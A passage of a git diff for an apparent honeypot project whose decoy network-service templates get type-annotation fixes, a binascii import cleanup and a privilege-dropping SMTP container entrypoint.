""" import base64 +import binascii import re from datetime import datetime, timezone from typing import Any, Optional @@ -144,7 +145,7 @@ def classify_authorization(header_value: Optional[str]) -> Optional[dict[str, An if scheme == "basic": try: decoded = base64.b64decode(rest, validate=True).decode("utf-8", errors="replace") - except (ValueError, base64.binascii.Error): + except (ValueError, binascii.Error): return None if ":" not in decoded: return None diff --git a/decnet/templates/k8s/syslog_bridge.py b/decnet/templates/k8s/syslog_bridge.py index 7bd1e33f..44cf514a 100644 --- a/decnet/templates/k8s/syslog_bridge.py +++ b/decnet/templates/k8s/syslog_bridge.py @@ -13,6 +13,7 @@ Facility: local0 (16). SD element ID uses PEN 55555. """ import base64 +import binascii import re from datetime import datetime, timezone from typing import Any, Optional @@ -144,7 +145,7 @@ def classify_authorization(header_value: Optional[str]) -> Optional[dict[str, An if scheme == "basic": try: decoded = base64.b64decode(rest, validate=True).decode("utf-8", errors="replace") - except (ValueError, base64.binascii.Error): + except (ValueError, binascii.Error): return None if ":" not in decoded: return None diff --git a/decnet/templates/ldap/server.py b/decnet/templates/ldap/server.py index 67126d35..3b9ffb5d 100644 --- a/decnet/templates/ldap/server.py +++ b/decnet/templates/ldap/server.py @@ -8,6 +8,7 @@ invalidCredentials error. Logs all interactions as JSON. 
import asyncio import os import re +from typing import cast import instance_seed as _seed from syslog_bridge import ( @@ -137,14 +138,17 @@ def _bind_error_response(message_id: int, result_code: int = 49, error_text: str class LDAPProtocol(asyncio.Protocol): + _transport: asyncio.Transport | None = None + _peer: tuple[str, int] | None = None + def __init__(self): self._transport = None self._peer = None self._buf = b"" - def connection_made(self, transport): - self._transport = transport - self._peer = transport.get_extra_info("peername", ("?", 0)) + def connection_made(self, transport: asyncio.BaseTransport) -> None: + self._transport = cast(asyncio.Transport, transport) + self._peer = cast(tuple[str, int], self._transport.get_extra_info("peername", ("?", 0))) _log("connect", src=self._peer[0], src_port=self._peer[1]) def data_received(self, data): @@ -171,7 +175,9 @@ class LDAPProtocol(asyncio.Protocol): self._buf = self._buf[msg_len:] self._handle_message(msg) - def _handle_message(self, msg: bytes): + def _handle_message(self, msg: bytes) -> None: + assert self._transport is not None + assert self._peer is not None # Extract messageID for the response try: message_id = msg[4] if len(msg) > 4 else 1 diff --git a/decnet/templates/ldap/syslog_bridge.py b/decnet/templates/ldap/syslog_bridge.py index 7bd1e33f..44cf514a 100644 --- a/decnet/templates/ldap/syslog_bridge.py +++ b/decnet/templates/ldap/syslog_bridge.py @@ -13,6 +13,7 @@ Facility: local0 (16). SD element ID uses PEN 55555. 
""" import base64 +import binascii import re from datetime import datetime, timezone from typing import Any, Optional @@ -144,7 +145,7 @@ def classify_authorization(header_value: Optional[str]) -> Optional[dict[str, An if scheme == "basic": try: decoded = base64.b64decode(rest, validate=True).decode("utf-8", errors="replace") - except (ValueError, base64.binascii.Error): + except (ValueError, binascii.Error): return None if ":" not in decoded: return None diff --git a/decnet/templates/llmnr/syslog_bridge.py b/decnet/templates/llmnr/syslog_bridge.py index 7bd1e33f..44cf514a 100644 --- a/decnet/templates/llmnr/syslog_bridge.py +++ b/decnet/templates/llmnr/syslog_bridge.py @@ -13,6 +13,7 @@ Facility: local0 (16). SD element ID uses PEN 55555. """ import base64 +import binascii import re from datetime import datetime, timezone from typing import Any, Optional @@ -144,7 +145,7 @@ def classify_authorization(header_value: Optional[str]) -> Optional[dict[str, An if scheme == "basic": try: decoded = base64.b64decode(rest, validate=True).decode("utf-8", errors="replace") - except (ValueError, base64.binascii.Error): + except (ValueError, binascii.Error): return None if ":" not in decoded: return None diff --git a/decnet/templates/mongodb/server.py b/decnet/templates/mongodb/server.py index 6a06cd2b..0d1cdc12 100644 --- a/decnet/templates/mongodb/server.py +++ b/decnet/templates/mongodb/server.py @@ -8,8 +8,10 @@ received messages as JSON. 
import asyncio import base64 +import binascii import os import struct +from typing import cast import instance_seed as _seed from syslog_bridge import syslog_line, write_syslog_file, forward_syslog @@ -197,6 +199,9 @@ def _log(event_type: str, severity: int = 6, **kwargs) -> None: class MongoDBProtocol(asyncio.Protocol): + _transport: asyncio.Transport | None = None + _peer: tuple[str, int] | None = None + def __init__(self): self._transport = None self._peer = None @@ -207,12 +212,13 @@ class MongoDBProtocol(asyncio.Protocol): self._sasl_username: str | None = None self._sasl_mechanism: str | None = None - def connection_made(self, transport): - self._transport = transport - self._peer = transport.get_extra_info("peername", ("?", 0)) + def connection_made(self, transport: asyncio.BaseTransport) -> None: + self._transport = cast(asyncio.Transport, transport) + self._peer = cast(tuple[str, int], self._transport.get_extra_info("peername", ("?", 0))) _log("connect", src=self._peer[0], src_port=self._peer[1]) - def data_received(self, data): + def data_received(self, data: bytes) -> None: + assert self._transport is not None self._buf += data while len(self._buf) >= 16: msg_len = struct.unpack(" None: + assert self._transport is not None + assert self._peer is not None if len(msg) < 16: return request_id = struct.unpack(" None: + assert self._peer is not None """Parse a single MongoDB command document for SCRAM auth. saslStart — client-first-message in payload. 
Extract @@ -318,7 +327,7 @@ class MongoDBProtocol(asyncio.Protocol): return try: proof_raw = base64.b64decode(proof_b64, validate=True) - except (ValueError, base64.binascii.Error): + except (ValueError, binascii.Error): return mech = (self._sasl_mechanism or "").upper() if "SHA-256" in mech or "SHA256" in mech: diff --git a/decnet/templates/mongodb/syslog_bridge.py b/decnet/templates/mongodb/syslog_bridge.py index 7bd1e33f..44cf514a 100644 --- a/decnet/templates/mongodb/syslog_bridge.py +++ b/decnet/templates/mongodb/syslog_bridge.py @@ -13,6 +13,7 @@ Facility: local0 (16). SD element ID uses PEN 55555. """ import base64 +import binascii import re from datetime import datetime, timezone from typing import Any, Optional @@ -144,7 +145,7 @@ def classify_authorization(header_value: Optional[str]) -> Optional[dict[str, An if scheme == "basic": try: decoded = base64.b64decode(rest, validate=True).decode("utf-8", errors="replace") - except (ValueError, base64.binascii.Error): + except (ValueError, binascii.Error): return None if ":" not in decoded: return None diff --git a/decnet/templates/mqtt/server.py b/decnet/templates/mqtt/server.py index 0e4a3ee7..ab0b1884 100644 --- a/decnet/templates/mqtt/server.py +++ b/decnet/templates/mqtt/server.py @@ -12,6 +12,7 @@ import json import os import random import struct +from typing import cast import instance_seed as _seed from syslog_bridge import ( @@ -209,6 +210,9 @@ def _generate_topics() -> dict: class MQTTProtocol(asyncio.Protocol): + _transport: asyncio.Transport | None = None + _peer: tuple[str, int] | None = None + def __init__(self): self._transport = None self._peer = None @@ -216,9 +220,9 @@ class MQTTProtocol(asyncio.Protocol): self._auth = False self._topics = _generate_topics() - def connection_made(self, transport): - self._transport = transport - self._peer = transport.get_extra_info("peername", ("?", 0)) + def connection_made(self, transport: asyncio.BaseTransport) -> None: + self._transport = 
cast(asyncio.Transport, transport) + self._peer = cast(tuple[str, int], self._transport.get_extra_info("peername", ("?", 0))) _log("connect", src=self._peer[0], src_port=self._peer[1]) def data_received(self, data): @@ -231,6 +235,8 @@ class MQTTProtocol(asyncio.Protocol): self._transport.close() def _process(self): + assert self._transport is not None + assert self._peer is not None while len(self._buf) >= 2: pkt_byte = self._buf[0] pkt_type = (pkt_byte >> 4) & 0x0f diff --git a/decnet/templates/mqtt/syslog_bridge.py b/decnet/templates/mqtt/syslog_bridge.py index 7bd1e33f..44cf514a 100644 --- a/decnet/templates/mqtt/syslog_bridge.py +++ b/decnet/templates/mqtt/syslog_bridge.py @@ -13,6 +13,7 @@ Facility: local0 (16). SD element ID uses PEN 55555. """ import base64 +import binascii import re from datetime import datetime, timezone from typing import Any, Optional @@ -144,7 +145,7 @@ def classify_authorization(header_value: Optional[str]) -> Optional[dict[str, An if scheme == "basic": try: decoded = base64.b64decode(rest, validate=True).decode("utf-8", errors="replace") - except (ValueError, base64.binascii.Error): + except (ValueError, binascii.Error): return None if ":" not in decoded: return None diff --git a/decnet/templates/mssql/server.py b/decnet/templates/mssql/server.py index d647f513..1d8618f7 100644 --- a/decnet/templates/mssql/server.py +++ b/decnet/templates/mssql/server.py @@ -9,6 +9,7 @@ import asyncio import base64 import os import struct +from typing import cast import instance_seed as _seed from syslog_bridge import syslog_line, write_syslog_file, forward_syslog @@ -108,18 +109,23 @@ def _tds_error_packet(message: str) -> bytes: class MSSQLProtocol(asyncio.Protocol): + _transport: asyncio.Transport | None = None + _peer: tuple[str, int] | None = None + def __init__(self): self._transport = None self._peer = None self._buf = b"" self._prelogin_done = False - def connection_made(self, transport): - self._transport = transport - self._peer = 
transport.get_extra_info("peername", ("?", 0)) + def connection_made(self, transport: asyncio.BaseTransport) -> None: + self._transport = cast(asyncio.Transport, transport) + self._peer = cast(tuple[str, int], self._transport.get_extra_info("peername", ("?", 0))) _log("connect", src=self._peer[0], src_port=self._peer[1]) - def data_received(self, data): + def data_received(self, data: bytes) -> None: + assert self._transport is not None + assert self._peer is not None self._buf += data while len(self._buf) >= 8: pkt_type = self._buf[0] @@ -138,7 +144,9 @@ class MSSQLProtocol(asyncio.Protocol): self._buf = b"" break - def _handle_packet(self, pkt_type: int, payload: bytes): + def _handle_packet(self, pkt_type: int, payload: bytes) -> None: + assert self._transport is not None + assert self._peer is not None if pkt_type == 0x12: # Pre-login self._transport.write(_PRELOGIN_RESP) self._prelogin_done = True diff --git a/decnet/templates/mssql/syslog_bridge.py b/decnet/templates/mssql/syslog_bridge.py index 7bd1e33f..44cf514a 100644 --- a/decnet/templates/mssql/syslog_bridge.py +++ b/decnet/templates/mssql/syslog_bridge.py @@ -13,6 +13,7 @@ Facility: local0 (16). SD element ID uses PEN 55555. 
""" import base64 +import binascii import re from datetime import datetime, timezone from typing import Any, Optional @@ -144,7 +145,7 @@ def classify_authorization(header_value: Optional[str]) -> Optional[dict[str, An if scheme == "basic": try: decoded = base64.b64decode(rest, validate=True).decode("utf-8", errors="replace") - except (ValueError, base64.binascii.Error): + except (ValueError, binascii.Error): return None if ":" not in decoded: return None diff --git a/decnet/templates/mysql/server.py b/decnet/templates/mysql/server.py index 17de3f33..59cd39b5 100644 --- a/decnet/templates/mysql/server.py +++ b/decnet/templates/mysql/server.py @@ -11,6 +11,7 @@ import base64 import itertools import os import struct +from typing import cast import instance_seed as _seed from syslog_bridge import syslog_line, write_syslog_file, forward_syslog @@ -74,6 +75,9 @@ def _log(event_type: str, severity: int = 6, **kwargs) -> None: class MySQLProtocol(asyncio.Protocol): + _transport: asyncio.Transport | None = None + _peer: tuple[str, int] | None = None + def __init__(self): self._transport = None self._peer = None @@ -84,15 +88,16 @@ class MySQLProtocol(asyncio.Protocol): # same decky never present identical auth challenges. 
self._salt = _seed.fresh_bytes(20) - def connection_made(self, transport): - self._transport = transport - self._peer = transport.get_extra_info("peername", ("?", 0)) + def connection_made(self, transport: asyncio.BaseTransport) -> None: + self._transport = cast(asyncio.Transport, transport) + self._peer = cast(tuple[str, int], self._transport.get_extra_info("peername", ("?", 0))) _log("connect", src=self._peer[0], src_port=self._peer[1], connection_id=self._conn_id) - transport.write(_make_packet(_build_greeting(self._conn_id, self._salt), seq=0)) + self._transport.write(_make_packet(_build_greeting(self._conn_id, self._salt), seq=0)) self._greeted = True - def data_received(self, data): + def data_received(self, data: bytes) -> None: + assert self._transport is not None self._buf += data # MySQL packets: 3-byte length + 1-byte seq + payload while len(self._buf) >= 4: @@ -107,7 +112,8 @@ class MySQLProtocol(asyncio.Protocol): self._buf = self._buf[4 + length:] self._handle_packet(payload) - def _handle_packet(self, payload: bytes): + def _handle_packet(self, payload: bytes) -> None: + assert self._peer is not None if not payload: return # Login packet: capability flags (4), max_packet (4), charset (1), diff --git a/decnet/templates/mysql/syslog_bridge.py b/decnet/templates/mysql/syslog_bridge.py index 7bd1e33f..44cf514a 100644 --- a/decnet/templates/mysql/syslog_bridge.py +++ b/decnet/templates/mysql/syslog_bridge.py @@ -13,6 +13,7 @@ Facility: local0 (16). SD element ID uses PEN 55555. 
""" import base64 +import binascii import re from datetime import datetime, timezone from typing import Any, Optional @@ -144,7 +145,7 @@ def classify_authorization(header_value: Optional[str]) -> Optional[dict[str, An if scheme == "basic": try: decoded = base64.b64decode(rest, validate=True).decode("utf-8", errors="replace") - except (ValueError, base64.binascii.Error): + except (ValueError, binascii.Error): return None if ":" not in decoded: return None diff --git a/decnet/templates/pop3/server.py b/decnet/templates/pop3/server.py index b7c82a22..49669240 100644 --- a/decnet/templates/pop3/server.py +++ b/decnet/templates/pop3/server.py @@ -13,6 +13,7 @@ import asyncio import os import time from pathlib import Path +from typing import cast from syslog_bridge import ( SEVERITY_WARNING, encode_secret, @@ -238,6 +239,9 @@ def _log(event_type: str, severity: int = 6, **kwargs) -> None: # ── Protocol ────────────────────────────────────────────────────────────────── class POP3Protocol(asyncio.Protocol): + _transport: asyncio.Transport | None = None + _peer: tuple[str, int] + def __init__(self): self._transport = None self._peer = ("?", 0) @@ -246,14 +250,14 @@ class POP3Protocol(asyncio.Protocol): self._current_user: str | None = None self._deleted: set[int] = set() # 0-based indices of DELE'd messages - def connection_made(self, transport): - self._transport = transport - self._peer = transport.get_extra_info("peername", ("?", 0)) + def connection_made(self, transport: asyncio.BaseTransport) -> None: + self._transport = cast(asyncio.Transport, transport) + self._peer = self._transport.get_extra_info("peername", ("?", 0)) _log("connect", src=self._peer[0], src_port=self._peer[1]) banner = POP3_BANNER if POP3_BANNER.endswith("\r\n") else POP3_BANNER + "\r\n" if not banner.startswith("+OK"): banner = "+OK " + banner - transport.write(banner.encode()) + self._transport.write(banner.encode()) def data_received(self, data): self._buf += data @@ -267,6 +271,7 @@ class 
POP3Protocol(asyncio.Protocol): # ── Command dispatch ────────────────────────────────────────────────────── def _handle_line(self, line: str) -> None: + assert self._transport is not None parts = line.split(None, 1) if not parts: return @@ -314,6 +319,7 @@ class POP3Protocol(asyncio.Protocol): # ── Command implementations ─────────────────────────────────────────────── def _cmd_user(self, args: str) -> None: + assert self._transport is not None if self._state != "AUTHORIZATION": self._transport.write(b"-ERR Already authenticated\r\n") return @@ -321,6 +327,7 @@ class POP3Protocol(asyncio.Protocol): self._transport.write(b"+OK User name accepted, password please\r\n") def _cmd_pass(self, args: str) -> None: + assert self._transport is not None if self._state != "AUTHORIZATION": self._transport.write(b"-ERR Already authenticated\r\n") return @@ -342,6 +349,7 @@ class POP3Protocol(asyncio.Protocol): self._transport.write(b"-ERR Authentication failed.\r\n") def _require_transaction(self) -> bool: + assert self._transport is not None if self._state != "TRANSACTION": self._transport.write(b"-ERR Not authenticated\r\n") return False @@ -356,6 +364,7 @@ class POP3Protocol(asyncio.Protocol): ] def _cmd_stat(self) -> None: + assert self._transport is not None if not self._require_transaction(): return msgs = self._active_messages() @@ -363,6 +372,7 @@ class POP3Protocol(asyncio.Protocol): self._transport.write(f"+OK {len(msgs)} {total}\r\n".encode()) def _cmd_list(self, args: str) -> None: + assert self._transport is not None if not self._require_transaction(): return emails = _get_emails() @@ -386,6 +396,7 @@ class POP3Protocol(asyncio.Protocol): self._transport.write(b".\r\n") def _cmd_retr(self, args: str) -> None: + assert self._transport is not None if not self._require_transaction(): return try: @@ -407,6 +418,7 @@ class POP3Protocol(asyncio.Protocol): self._transport.write(b"-ERR Invalid argument\r\n") def _cmd_top(self, args: str) -> None: + assert self._transport 
is not None if not self._require_transaction(): return try: @@ -436,6 +448,7 @@ class POP3Protocol(asyncio.Protocol): self._transport.write(b"-ERR Invalid arguments\r\n") def _cmd_uidl(self, args: str) -> None: + assert self._transport is not None if not self._require_transaction(): return if args: @@ -455,6 +468,7 @@ class POP3Protocol(asyncio.Protocol): self._transport.write(b".\r\n") def _cmd_dele(self, args: str) -> None: + assert self._transport is not None if not self._require_transaction(): return try: @@ -470,6 +484,7 @@ class POP3Protocol(asyncio.Protocol): self._transport.write(b"-ERR Invalid argument\r\n") def _cmd_rset(self) -> None: + assert self._transport is not None if not self._require_transaction(): return self._deleted.clear() diff --git a/decnet/templates/pop3/syslog_bridge.py b/decnet/templates/pop3/syslog_bridge.py index 7bd1e33f..44cf514a 100644 --- a/decnet/templates/pop3/syslog_bridge.py +++ b/decnet/templates/pop3/syslog_bridge.py @@ -13,6 +13,7 @@ Facility: local0 (16). SD element ID uses PEN 55555. """ import base64 +import binascii import re from datetime import datetime, timezone from typing import Any, Optional @@ -144,7 +145,7 @@ def classify_authorization(header_value: Optional[str]) -> Optional[dict[str, An if scheme == "basic": try: decoded = base64.b64decode(rest, validate=True).decode("utf-8", errors="replace") - except (ValueError, base64.binascii.Error): + except (ValueError, binascii.Error): return None if ":" not in decoded: return None diff --git a/decnet/templates/postgres/server.py b/decnet/templates/postgres/server.py index 7917000b..a69c1c77 100644 --- a/decnet/templates/postgres/server.py +++ b/decnet/templates/postgres/server.py @@ -9,6 +9,7 @@ returns an error. Logs all interactions as JSON. 
import asyncio import os import struct +from typing import cast import instance_seed as _seed import base64 as _base64 @@ -59,15 +60,18 @@ def _log(event_type: str, severity: int = 6, **kwargs) -> None: class PostgresProtocol(asyncio.Protocol): + _transport: asyncio.Transport | None = None + _peer: tuple[str, int] | None = None + def __init__(self): self._transport = None self._peer = None self._buf = b"" self._state = "startup" - def connection_made(self, transport): - self._transport = transport - self._peer = transport.get_extra_info("peername", ("?", 0)) + def connection_made(self, transport: asyncio.BaseTransport) -> None: + self._transport = cast(asyncio.Transport, transport) + self._peer = cast(tuple[str, int], self._transport.get_extra_info("peername", ("?", 0))) _log("connect", src=self._peer[0], src_port=self._peer[1]) def data_received(self, data): @@ -75,6 +79,7 @@ class PostgresProtocol(asyncio.Protocol): self._process() def _process(self): + assert self._transport is not None if self._state == "startup": if len(self._buf) < 4: return @@ -104,7 +109,9 @@ class PostgresProtocol(asyncio.Protocol): if msg_type == "p": self._handle_password(payload) - def _handle_startup(self, msg: bytes): + def _handle_startup(self, msg: bytes) -> None: + assert self._transport is not None + assert self._peer is not None # Startup message: length(4) + protocol_version(4) + params (key=value\0 pairs) if len(msg) < 8: return @@ -128,8 +135,8 @@ class PostgresProtocol(asyncio.Protocol): # rejects *before* asking for a password. Short-circuit so the decoy # matches that behavior and exposes the per-decky DB list. 
if database and database not in _DATABASES: - msg = f'database "{database}" does not exist' - self._transport.write(_error_response("FATAL", "3D000", msg)) + err_msg = f'database "{database}" does not exist' + self._transport.write(_error_response("FATAL", "3D000", err_msg)) self._transport.close() return self._state = "auth" @@ -137,7 +144,9 @@ class PostgresProtocol(asyncio.Protocol): auth_md5 = b"R" + struct.pack(">I", 12) + struct.pack(">I", 5) + salt self._transport.write(auth_md5) - def _handle_password(self, payload: bytes): + def _handle_password(self, payload: bytes) -> None: + assert self._transport is not None + assert self._peer is not None # Postgres MD5 challenge-response: the wire form is the literal # ASCII string "md5" + 32 hex chars (md5(md5(pw+user)+salt)). # Plaintext is unrecoverable, so we land this in the Credential diff --git a/decnet/templates/postgres/syslog_bridge.py b/decnet/templates/postgres/syslog_bridge.py index 7bd1e33f..44cf514a 100644 --- a/decnet/templates/postgres/syslog_bridge.py +++ b/decnet/templates/postgres/syslog_bridge.py @@ -13,6 +13,7 @@ Facility: local0 (16). SD element ID uses PEN 55555. 
""" import base64 +import binascii import re from datetime import datetime, timezone from typing import Any, Optional @@ -144,7 +145,7 @@ def classify_authorization(header_value: Optional[str]) -> Optional[dict[str, An if scheme == "basic": try: decoded = base64.b64decode(rest, validate=True).decode("utf-8", errors="replace") - except (ValueError, base64.binascii.Error): + except (ValueError, binascii.Error): return None if ":" not in decoded: return None diff --git a/decnet/templates/rdp/ntlmssp.py b/decnet/templates/rdp/ntlmssp.py index b0271a9a..95db7c66 100644 --- a/decnet/templates/rdp/ntlmssp.py +++ b/decnet/templates/rdp/ntlmssp.py @@ -120,7 +120,7 @@ def parse_type3(blob: bytes) -> Optional[dict]: if domain: principal = f"{domain}\\{username}" else: - principal = username or None + principal = username return { "username": username, diff --git a/decnet/templates/rdp/server.py b/decnet/templates/rdp/server.py index 3b7426e7..68f188a1 100644 --- a/decnet/templates/rdp/server.py +++ b/decnet/templates/rdp/server.py @@ -331,6 +331,7 @@ async def _upgrade_to_tls_and_capture( # into a StreamReader/StreamWriter pair the rest of the handler can use. new_reader = asyncio.StreamReader(loop=loop) new_protocol = asyncio.StreamReaderProtocol(new_reader, loop=loop) + assert new_transport is not None new_transport.set_protocol(new_protocol) new_protocol.connection_made(new_transport) new_writer = asyncio.StreamWriter(new_transport, new_protocol, new_reader, loop) diff --git a/decnet/templates/rdp/syslog_bridge.py b/decnet/templates/rdp/syslog_bridge.py index 7bd1e33f..44cf514a 100644 --- a/decnet/templates/rdp/syslog_bridge.py +++ b/decnet/templates/rdp/syslog_bridge.py @@ -13,6 +13,7 @@ Facility: local0 (16). SD element ID uses PEN 55555. 
""" import base64 +import binascii import re from datetime import datetime, timezone from typing import Any, Optional @@ -144,7 +145,7 @@ def classify_authorization(header_value: Optional[str]) -> Optional[dict[str, An if scheme == "basic": try: decoded = base64.b64decode(rest, validate=True).decode("utf-8", errors="replace") - except (ValueError, base64.binascii.Error): + except (ValueError, binascii.Error): return None if ":" not in decoded: return None diff --git a/decnet/templates/redis/server.py b/decnet/templates/redis/server.py index 8e09ec67..d9e1c246 100644 --- a/decnet/templates/redis/server.py +++ b/decnet/templates/redis/server.py @@ -7,6 +7,7 @@ KEYS, and arbitrary commands. Logs every command and argument as JSON. import asyncio import os +from typing import cast import instance_seed as _seed from syslog_bridge import ( @@ -203,15 +204,18 @@ def _config_get(pattern: str) -> bytes: class RedisProtocol(asyncio.Protocol): + _transport: asyncio.Transport | None = None + _peer: tuple[str, int] | None = None + def __init__(self): self._transport = None self._peer = None self._parser = RESPParser() self._authed = not _REQUIREPASS # auth satisfied iff no password set - def connection_made(self, transport): - self._transport = transport - self._peer = transport.get_extra_info("peername", ("?", 0)) + def connection_made(self, transport: asyncio.BaseTransport) -> None: + self._transport = cast(asyncio.Transport, transport) + self._peer = cast(tuple[str, int], self._transport.get_extra_info("peername", ("?", 0))) _log("connect", src=self._peer[0], src_port=self._peer[1]) def data_received(self, data): @@ -228,7 +232,8 @@ class RedisProtocol(asyncio.Protocol): if self._transport and not self._transport.is_closing(): self._transport.write(payload) - def _handle_command(self, parts): + def _handle_command(self, parts) -> None: + assert self._peer is not None if not parts: return verb = parts[0].upper() diff --git a/decnet/templates/redis/syslog_bridge.py 
b/decnet/templates/redis/syslog_bridge.py index 7bd1e33f..44cf514a 100644 --- a/decnet/templates/redis/syslog_bridge.py +++ b/decnet/templates/redis/syslog_bridge.py @@ -13,6 +13,7 @@ Facility: local0 (16). SD element ID uses PEN 55555. """ import base64 +import binascii import re from datetime import datetime, timezone from typing import Any, Optional @@ -144,7 +145,7 @@ def classify_authorization(header_value: Optional[str]) -> Optional[dict[str, An if scheme == "basic": try: decoded = base64.b64decode(rest, validate=True).decode("utf-8", errors="replace") - except (ValueError, base64.binascii.Error): + except (ValueError, binascii.Error): return None if ":" not in decoded: return None diff --git a/decnet/templates/sip/server.py b/decnet/templates/sip/server.py index 66e504b1..0915f087 100644 --- a/decnet/templates/sip/server.py +++ b/decnet/templates/sip/server.py @@ -8,6 +8,7 @@ Authorization header and call metadata, then responds with 401 Unauthorized. import asyncio import os import re +from typing import cast from syslog_bridge import ( classify_authorization, forward_syslog, @@ -98,11 +99,13 @@ def _handle_message(data: bytes, src_addr) -> bytes | None: class SIPUDPProtocol(asyncio.DatagramProtocol): + _transport: asyncio.DatagramTransport | None = None + def __init__(self): self._transport = None - def connection_made(self, transport): - self._transport = transport + def connection_made(self, transport: asyncio.BaseTransport) -> None: + self._transport = cast(asyncio.DatagramTransport, transport) def datagram_received(self, data, addr): response = _handle_message(data, addr) @@ -111,21 +114,24 @@ class SIPUDPProtocol(asyncio.DatagramProtocol): class SIPTCPProtocol(asyncio.Protocol): + _transport: asyncio.Transport | None = None + _peer: tuple[str, int] | None = None + def __init__(self): self._transport = None self._peer = None self._buf = b"" - def connection_made(self, transport): - self._transport = transport - self._peer = 
transport.get_extra_info("peername", ("?", 0)) + def connection_made(self, transport: asyncio.BaseTransport) -> None: + self._transport = cast(asyncio.Transport, transport) + self._peer = cast(tuple[str, int], self._transport.get_extra_info("peername", ("?", 0))) - def data_received(self, data): + def data_received(self, data: bytes) -> None: self._buf += data if b"\r\n\r\n" in self._buf or b"\n\n" in self._buf: response = _handle_message(self._buf, self._peer) self._buf = b"" - if response: + if response and self._transport: self._transport.write(response) def connection_lost(self, exc): diff --git a/decnet/templates/sip/syslog_bridge.py b/decnet/templates/sip/syslog_bridge.py index 7bd1e33f..44cf514a 100644 --- a/decnet/templates/sip/syslog_bridge.py +++ b/decnet/templates/sip/syslog_bridge.py @@ -13,6 +13,7 @@ Facility: local0 (16). SD element ID uses PEN 55555. """ import base64 +import binascii import re from datetime import datetime, timezone from typing import Any, Optional @@ -144,7 +145,7 @@ def classify_authorization(header_value: Optional[str]) -> Optional[dict[str, An if scheme == "basic": try: decoded = base64.b64decode(rest, validate=True).decode("utf-8", errors="replace") - except (ValueError, base64.binascii.Error): + except (ValueError, binascii.Error): return None if ":" not in decoded: return None diff --git a/decnet/templates/smb/ntlmssp.py b/decnet/templates/smb/ntlmssp.py index b0271a9a..95db7c66 100644 --- a/decnet/templates/smb/ntlmssp.py +++ b/decnet/templates/smb/ntlmssp.py @@ -120,7 +120,7 @@ def parse_type3(blob: bytes) -> Optional[dict]: if domain: principal = f"{domain}\\{username}" else: - principal = username or None + principal = username return { "username": username, diff --git a/decnet/templates/smb/syslog_bridge.py b/decnet/templates/smb/syslog_bridge.py index 7bd1e33f..44cf514a 100644 --- a/decnet/templates/smb/syslog_bridge.py +++ b/decnet/templates/smb/syslog_bridge.py @@ -13,6 +13,7 @@ Facility: local0 (16). 
SD element ID uses PEN 55555. """ import base64 +import binascii import re from datetime import datetime, timezone from typing import Any, Optional @@ -144,7 +145,7 @@ def classify_authorization(header_value: Optional[str]) -> Optional[dict[str, An if scheme == "basic": try: decoded = base64.b64decode(rest, validate=True).decode("utf-8", errors="replace") - except (ValueError, base64.binascii.Error): + except (ValueError, binascii.Error): return None if ":" not in decoded: return None diff --git a/decnet/templates/smtp/Dockerfile b/decnet/templates/smtp/Dockerfile index 68d28efa..d8a695c0 100644 --- a/decnet/templates/smtp/Dockerfile +++ b/decnet/templates/smtp/Dockerfile @@ -20,5 +20,6 @@ RUN useradd -r -s /bin/false -d /opt logrelay \ HEALTHCHECK --interval=30s --timeout=5s --start-period=10s --retries=3 \ CMD kill -0 1 || exit 1 -USER logrelay +# Entrypoint runs as root so it can fix quarantine dir permissions before +# dropping to logrelay via su. ENTRYPOINT ["/entrypoint.sh"] diff --git a/decnet/templates/smtp/entrypoint.sh b/decnet/templates/smtp/entrypoint.sh index c830b733..528bdacf 100644 --- a/decnet/templates/smtp/entrypoint.sh +++ b/decnet/templates/smtp/entrypoint.sh @@ -1,3 +1,12 @@ #!/bin/bash set -e -exec python3 /opt/server.py + +# Fix quarantine dir permissions before dropping privileges — the dir is +# bind-mounted from the host (owned by the decnet user) and must be writable +# by the logrelay process inside the container. 
+if [ -n "$SMTP_QUARANTINE_DIR" ]; then + mkdir -p "$SMTP_QUARANTINE_DIR" + chmod 0777 "$SMTP_QUARANTINE_DIR" +fi + +exec su -s /bin/sh logrelay -c "exec python3 /opt/server.py" diff --git a/decnet/templates/smtp/server.py b/decnet/templates/smtp/server.py index 537c2f90..fbc888ef 100644 --- a/decnet/templates/smtp/server.py +++ b/decnet/templates/smtp/server.py @@ -30,6 +30,7 @@ from datetime import datetime, timezone from email import message_from_bytes from email.header import decode_header, make_header from email.message import Message +from typing import cast import instance_seed as _seed from syslog_bridge import ( @@ -41,7 +42,7 @@ from syslog_bridge import ( ) NODE_NAME = os.environ.get("NODE_NAME", "mailserver") -SERVICE_NAME = "smtp" +SERVICE_NAME = os.environ.get("SMTP_SERVICE_NAME", "smtp") LOG_TARGET = os.environ.get("LOG_TARGET", "") PORT = int(os.environ.get("PORT", "25")) OPEN_RELAY = os.environ.get("SMTP_OPEN_RELAY", "0").strip() == "1" @@ -150,7 +151,8 @@ def _summarize_message(body: bytes, msg_id: str) -> dict: if not filename and "attachment" not in disposition: continue try: - payload = part.get_payload(decode=True) or b"" + _raw = part.get_payload(decode=True) or b"" + payload: bytes = _raw if isinstance(_raw, bytes) else b"" except Exception: payload = b"" attachments.append({ @@ -207,6 +209,9 @@ def _decode_auth_plain(blob: str) -> tuple[str, str]: class SMTPProtocol(asyncio.Protocol): + _transport: asyncio.Transport | None = None + _peer: tuple[str, int] + def __init__(self): self._transport = None self._peer = ("?", 0) @@ -228,11 +233,11 @@ class SMTPProtocol(asyncio.Protocol): # ── asyncio.Protocol ────────────────────────────────────────────────────── - def connection_made(self, transport): - self._transport = transport - self._peer = transport.get_extra_info("peername", ("?", 0)) + def connection_made(self, transport: asyncio.BaseTransport) -> None: + self._transport = cast(asyncio.Transport, transport) + self._peer = 
self._transport.get_extra_info("peername", ("?", 0)) _log("connect", src=self._peer[0], src_port=self._peer[1]) - transport.write(f"{_SMTP_BANNER}\r\n".encode()) + self._transport.write(f"{_SMTP_BANNER}\r\n".encode()) def data_received(self, data): self._buf += data @@ -247,6 +252,7 @@ class SMTPProtocol(asyncio.Protocol): # ── Command dispatch ────────────────────────────────────────────────────── def _handle_line(self, line: str) -> None: + assert self._transport is not None # ── DATA body accumulation ──────────────────────────────────────────── if self._in_data: if line == ".": @@ -444,6 +450,7 @@ class SMTPProtocol(asyncio.Protocol): # ── AUTH helpers ────────────────────────────────────────────────────────── def _handle_auth(self, args: str) -> None: + assert self._transport is not None parts = args.split(None, 1) mech = parts[0].upper() if parts else "" initial = parts[1] if len(parts) > 1 else "" @@ -468,6 +475,7 @@ class SMTPProtocol(asyncio.Protocol): self._transport.write(b"504 5.5.4 Unrecognized authentication mechanism\r\n") def _finish_auth(self, username: str, password: str) -> None: + assert self._transport is not None _log("auth_attempt", 